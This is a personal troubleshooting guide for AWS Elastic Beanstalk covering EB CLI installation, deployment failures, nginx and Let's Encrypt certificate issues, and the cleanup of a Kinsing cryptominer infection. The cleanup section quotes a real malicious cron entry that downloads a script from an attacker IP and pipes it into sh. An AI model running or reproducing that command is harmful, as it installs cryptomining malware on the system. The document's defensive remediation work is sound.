Troubleshooting Elastic Beanstalk Deployment

Installation

EB CLI is missing python

The EB CLI installer is hosted on GitHub.

Uninstall EB CLI:

$ rm -rf ~/.ebcli-virtual-env/

Also make sure that EB CLI has not been installed using brew:

$ brew uninstall awsebcli

Refer to Advanced Use in the GitHub README for installation instructions. Install just the EB CLI (as opposed to the package installer, which also installs Python), and point it to an existing Python installation:

$ python ./aws-elastic-beanstalk-cli-setup/scripts/ebcli_installer.py --python-installation /path/to/local/python/

If for some reason EB CLI requires a version of python that is not installed locally, use pyenv to install that version of python and use the method above to link EB CLI to it.
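
The pyenv route described above can be sketched as follows. This assumes pyenv is already installed, that the setup repository has been cloned into the current directory, and that --python-installation accepts the path to the interpreter. The function name install_ebcli_with_pyenv is hypothetical.

```shell
# Install a Python version with pyenv (if missing) and point the EB CLI
# installer at that interpreter. $1 is the Python version to use.
install_ebcli_with_pyenv() {
  version="$1"
  # -s skips the build when this version is already installed.
  pyenv install -s "$version" || return 1
  # pyenv prefix prints the install directory of the given version.
  python_bin="$(pyenv prefix "$version")/bin/python"
  python ./aws-elastic-beanstalk-cli-setup/scripts/ebcli_installer.py \
    --python-installation "$python_bin"
}
```

Call it with whichever version the EB CLI asks for, e.g. install_ebcli_with_pyenv 3.11.9 (the version number here is only an example).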

Deployment

eb deploy failure

Run eb logs in the local distribution of the environment to view the latest commands run in the EBS environment.
- If eb logs generates a "permission denied" message, try eb logs --instance [EBS-INSTANCE-ID] --verbose
View the tail of the file /var/log/cfn-init-cmd.log. This file will list all commands in .ebextensions and whether they executed successfully or not.
Check the .ebextensions config files on the server in /var/app/staging/
Confirm the domain settings in AWS Route 53.
Confirm that the web files have been uploaded to /var/www/html/.
Confirm the EBS raw URL to the site: AWS Console > Elastic Beanstalk > Environments > click on the URL for the environment in question
Scale back the application and incrementally deploy.
- Remove all web files except for a boilerplate "Hello, World" index file.
- Comment out all commands in .ebextensions configuration files.
- Remove composer.json
- Run eb deploy to see if it can successfully upload this most basic environment.
- Incrementally add back components of the application and redeploy to isolate problematic components.
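
When checking the cfn-init command log mentioned in the steps above, it can help to filter the tail of the file for failures. The following is a rough sketch: the function name show_failed_commands and the search pattern are assumptions, not part of the EB tooling, and reading the log on the server may require sudo.

```shell
# Print lines mentioning an error or failure from the tail of a log file.
# $1: log file (defaults to the cfn-init command log), $2: number of lines.
# Exits non-zero when no matching line is found.
show_failed_commands() {
  log_file="${1:-/var/log/cfn-init-cmd.log}"
  line_count="${2:-100}"
  tail -n "$line_count" "$log_file" | grep -i -E 'error|fail'
}
```

Run show_failed_commands with no arguments on the instance to scan the last 100 lines of the default log.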

Directives in .ebextensions config files aren't executed

The EB CLI uses git HEAD to create the zip file that it uploads to the server, so uncommitted changes are not deployed.

Confirm that the config files have been added and committed to the repo.

Or to deploy changes before they are committed:

$ eb deploy --staged

Make sure to stage any edits with git (e.g. git add) before running eb deploy with the --staged option!
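
Because the upload is built from git, a quick check before deploying can show whether anything under .ebextensions is still pending. This is a minimal sketch; the function names are hypothetical, and it assumes it is run from the root of the repository.

```shell
# List .ebextensions files that differ from git HEAD (untracked, modified,
# or staged but not committed). Empty output means HEAD is up to date.
ebextensions_pending() {
  git status --porcelain -- .ebextensions
}

# Succeed only when nothing under .ebextensions is pending.
ebextensions_committed() {
  [ -z "$(ebextensions_pending)" ]
}
```

For example, ebextensions_committed && eb deploy runs the deployment only when the config files are committed; otherwise ebextensions_pending shows what is outstanding.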

Cannot create files in /etc/nginx/conf.d with .ebextensions

According to this Stackoverflow thread, WebSockets on Elastic Beanstalk with Docker, it seems that when EBS creates an application it basically clears out the nginx configuration after the .ebextensions commands are run. So any custom nginx configuration done through .ebextensions would be overwritten.

I have confirmed this insofar as I put my nginx configuration in a file and uploaded it successfully to the ec2-user home directory. I put in another command to move that file to the nginx configuration directory, and after the application was successfully deployed, the custom nginx configuration file was gone.

There were some solutions offered on the Stackoverflow thread above. They involved moving Python scripts to an EBS “hooks” directory which would be executed after the application is deployed. There is no “hooks” directory in that location on my EBS server. For the time being, I am manually creating the nginx config file on the command line on the server after the application is deployed. This will allow the server to use the Let’s Encrypt certificates to serve https requests, and should stay in place through LE certificate renewals until the next application deployment.

The AWS documentation assumes that you generate the certificates manually and insert the contents of the certificate in the .ebextensions config file. The alternative example above places the command to generate the certificates in the .ebextensions config file. There is a flag that is incompatible with production environments: --staging. This will cause the Let's Encrypt staging server to issue the certificates. The server address will also get stored in a local config file, so subsequent attempts to reissue the certificates without the --staging flag will still invoke that staging server. ^[1]

systemctl command not found

The AWS documentation uses systemctl to restart the Apache server. If this command is not available use the service command instead.
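
The fallback described above might look like this in a script. It is a sketch only: restart_service is a hypothetical helper, and httpd is assumed to be the Apache service name on the instance. Both commands normally need root privileges.

```shell
# Restart a service with systemctl when available, otherwise with service.
# $1: service name, e.g. httpd for Apache.
restart_service() {
  if command -v systemctl >/dev/null 2>&1; then
    systemctl restart "$1"
  else
    service "$1" restart
  fi
}
```

Usage: restart_service httpd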

Cannot find SSLCertificateFile directive

Running letsencrypt-auto or certbot-auto fails with the following messages:

Cannot find an SSLCertificateFile directive in /files/etc/httpd/conf/httpd-le-ssl.conf/IfModule/VirtualHost. VirtualHost was not modified
Unable to find an SSLCertificateFile directive

This was fixed by installing mod_ssl.

Re-installing certificates after upgrading an Elastic Beanstalk instance platform

See Easy Secure Single-Instance Elastic Beanstalk Apps.

The idea behind this is:

Run a script that checks if security certificates are installed.
1. Certificates are not installed.
  1. Download and install the certbot utility script if it is not installed.
  2. Use certbot to install Let's Encrypt certificates.
  3. After installing the LE certificates, certbot will update the nginx configuration files to allow SSL to reference the certificates.
2. Certificates are installed.
  1. Do not attempt to install any certificates.
  2. Before deploying the app, save the nginx config files modified by certbot.
  3. After deploying the app, restore the nginx config files that were modified by certbot.
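
The building blocks of that outline can be sketched as three small shell functions. The function names and the backup directory are hypothetical, fullchain.pem is the certificate file certbot normally writes for each domain, and how the functions are wired into the deployment (before and after the app is deployed) is left open here.

```shell
# Succeed when a Let's Encrypt certificate exists for the domain.
# $1: live directory (normally /etc/letsencrypt/live), $2: domain name.
certs_installed() {
  [ -f "$1/$2/fullchain.pem" ]
}

# Copy the nginx .conf files from directory $1 to backup directory $2.
save_nginx_conf() {
  mkdir -p "$2" && cp -p "$1"/*.conf "$2"/
}

# Copy the saved .conf files from backup directory $2 back into $1.
restore_nginx_conf() {
  cp -p "$2"/*.conf "$1"/
}
```

A pre-deploy step could call certs_installed and, if it succeeds, save_nginx_conf /etc/nginx/conf.d /path/to/backup; a post-deploy step would then call restore_nginx_conf with the same two arguments.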

Connectivity

Empty HTTP response

Symptom

Make a request for the URL of the site via curl:

$ curl https://www.mydomain.com

0 bytes and no headers sent in response.

Possible cause

PHP code is exiting without errors, but before returning a response.

Solution

Check nginx logs.

/var/log/nginx/access.log
/var/log/nginx/error.log

PHP errors are logged to the nginx error log.

Confirm that requests are being made to the correct host. If nothing is reported in the log files, try connecting to a non-existent file. Then view the access log to confirm that a 404 error was logged.
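
To confirm that the 404 was logged, the access log can be counted by status code. This sketch assumes the status code is the 9th whitespace-separated field, as in nginx's default combined log format; a custom log_format may place it elsewhere. The function name count_status is hypothetical.

```shell
# Count requests in an nginx access log that returned a given status code.
# $1: status code, $2: log file.
count_status() {
  awk -v code="$1" '$9 == code { n++ } END { print n + 0 }' "$2"
}
```

Run count_status 404 /var/log/nginx/access.log before and after requesting the non-existent file; the count should go up by one if the request reached this host.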

Confirm PHP configuration. Upload a simple index.php file to the server containing a "Hello world" type of response. Make a request to that page. If the server returns the expected response, then it will be necessary to step through the production PHP to locate the code that is causing the script to exit without a response.

ERR_CONNECTION_REFUSED in Chrome

Attempting to load the site using https protocol in Chrome results in ERR_CONNECTION_REFUSED error.

Check the security certificates in /etc/letsencrypt/live/. There should be a directory with the name of the domain, and another directory named ebcert that is a symbolic link to /etc/letsencrypt/live/securedomainname.com
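
The directory and symbolic link check above can be scripted roughly as follows. check_ebcert_link is a hypothetical helper, and the -ef test (true when two paths resolve to the same file) is assumed to be supported by the shell in use, as it is in bash and dash.

```shell
# Check that the certificate directory for a domain exists and that the
# ebcert symbolic link points at it.
# $1: live directory (normally /etc/letsencrypt/live), $2: domain name.
check_ebcert_link() {
  live_dir="$1"
  domain="$2"
  [ -d "$live_dir/$domain" ] || { echo "missing: $live_dir/$domain"; return 1; }
  [ -L "$live_dir/ebcert" ] || { echo "not a symlink: $live_dir/ebcert"; return 1; }
  # -ef is true when both paths resolve to the same directory.
  [ "$live_dir/ebcert" -ef "$live_dir/$domain" ] || { echo "ebcert points elsewhere"; return 1; }
  echo "ok"
}
```

Usage: check_ebcert_link /etc/letsencrypt/live securedomainname.com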

If this directory does not exist, refer to Elastic Beanstalk Security Certificates for instructions on installing the security certificates.

Check that the server is configured to accept requests on port 443, e.g. in /etc/nginx/conf.d/https_custom.conf
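
A quick way to confirm that a config file declares a listener on port 443 is to search it for a listen directive. This is a sketch with a hypothetical function name; it only inspects the file and does not prove that nginx has loaded it or that the port is reachable from outside.

```shell
# Succeed when an nginx config file contains a listen directive for port 443.
# $1: config file, e.g. /etc/nginx/conf.d/https_custom.conf
listens_on_443() {
  grep -E -q '^[[:space:]]*listen[[:space:]]+([^;[:space:]]*:)?443([[:space:];]|$)' "$1"
}
```

Usage: listens_on_443 /etc/nginx/conf.d/https_custom.conf && echo "443 configured"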

The nginx configuration is reset to its defaults during eb deploy, which removes the certificate configuration from the server. A way to insert custom configuration on the server via .ebextensions directives has not been found yet, so it may be necessary to copy this https configuration file to the server manually after running eb deploy.

403 HTTP error

A 403 error when loading the hosted site may indicate that something unintended was uploaded to the root of the web directory.

SSH to the server to confirm the content of that directory, e.g. /var/www/html/.
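
One thing worth checking while inspecting that directory is whether a readable index file is present, since a web root without one is a common source of 403 responses. The sketch below assumes the index file is named index.php or index.html; check_index_file is a hypothetical helper.

```shell
# Report whether a web root contains a readable index file.
# $1: web root directory, e.g. /var/www/html
check_index_file() {
  for name in index.php index.html; do
    if [ -r "$1/$name" ]; then
      echo "found: $1/$name"
      return 0
    fi
  done
  echo "no readable index file in $1"
  return 1
}
```

Usage: check_index_file /var/www/html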

Elastic Beanstalk environment health

CPU is maxed out

Symptom

The environment is displayed with a warning in the Elastic Beanstalk console. Under the Health tab for the environment the cause is reported as "100% of CPU is in use".

Diagnostics

Run top on the server command line to find which process is using the CPU.

Solution

These are symptoms of a Kinsing malware infection.

A process named kdevtmpfsi is cryptocurrency mining malware. Making the files that the process accesses unavailable to it will prevent it from using the CPU. ^[2]

Confirm the process that is consuming the CPU:

$ top

Kill the process:

$ kill -9 [PID]

Search for files the scripts rely on. These are typically located in /tmp

$ find / -name "kdevtmpfs*"
$ find / -name "kinsing*"

Search inside files for references to kdevtmpfsi.

$ find / -type f -exec grep -l "kdevtmpfsi" {} +

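Prevent access to files in /tmp by removing all permissions from them. Note that chattr -i clears the immutable attribute; to stop the malware from replacing the locked files, the attribute would be set with chattr +i instead.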

$ chmod 000 /tmp/kdevtmpfsi*
$ chmod 000 /tmp/kinsing*
$ chmod 000 /tmp/zzz
$ chattr -iR /tmp/kdevtmpfsi*
$ chattr -iR /tmp/kinsing*
$ chattr -iR /tmp/zzz

Search for cron jobs that are re-installing the malware. In the last case the cron job was owned by the user webapp.

$ crontab -u webapp -l

On an infected system, this will result in something like this:

* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
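
Entries of this kind can be picked out of a crontab listing automatically. The filter below is a sketch with a hypothetical name; it only matches lines that pipe a wget or curl download directly into sh or bash, so other persistence tricks will not be caught.

```shell
# Read crontab text on stdin and print entries that pipe a download
# (wget or curl) straight into a shell.
flag_download_cron() {
  grep -E '(wget|curl)[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|$)'
}
```

Usage: crontab -u webapp -l | flag_download_cron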

The crontab for another user can be edited with:

$ crontab -e -u [USER]

Or if the only line is the command that downloads the mining script, the crontab for the user can be deleted entirely with

$ crontab -u [USER] -r

Show all processes that the user is currently running and kill any mining processes.

$ ps -ef | grep [USER]

Restrict /var/tmp to its owner, and set /tmp to the standard world-writable mode with the sticky bit:

$ chmod go-rwx /var/tmp
$ chmod 1777 /tmp

Allow only root (and other select accounts) to modify crontab:

$ touch /etc/cron.allow
$ echo "root" > /etc/cron.allow
$ echo "{otherusername}" >> /etc/cron.allow
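
The same result can be produced in one step with a small helper. This is a sketch: write_cron_allow is a hypothetical name, it always lists root first, and it overwrites the target file.

```shell
# Write a cron.allow file listing one permitted user per line.
# $1: target file (normally /etc/cron.allow), remaining args: extra user names.
write_cron_allow() {
  target="$1"
  shift
  printf '%s\n' root "$@" > "$target"
}
```

Usage (as root): write_cron_allow /etc/cron.allow {otherusername}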

TODO: This malware is associated with Docker containers, redis, PHPMailer, and Solr. I don't think any of these components are part of the current app distribution, but search for them before any future deployments.

TODO: Block those IP addresses in EC2.

- A comment on Delete MINER from php-fpm container! laradock GitHub issue #2451 describes how to block the miner until the server can be rebuilt.
- kdevtmpfsi & kinsing - the malware miner that will eat your CPU has information about identifying and disabling the source of the malware.
- a suspicious process named 'kdevtmpfsi'，likely related to redis official image
- Threat Alert: Kinsing Malware Attacks Targeting Container Environments has detailed information about the nature of the malware, but not much information about how to remove the malware.

Notes

[1] CN=Fake LE Intermediate X1 - Let's Encrypt forums
[2] kdevtmpfsi using the entire cpu - StackOverflow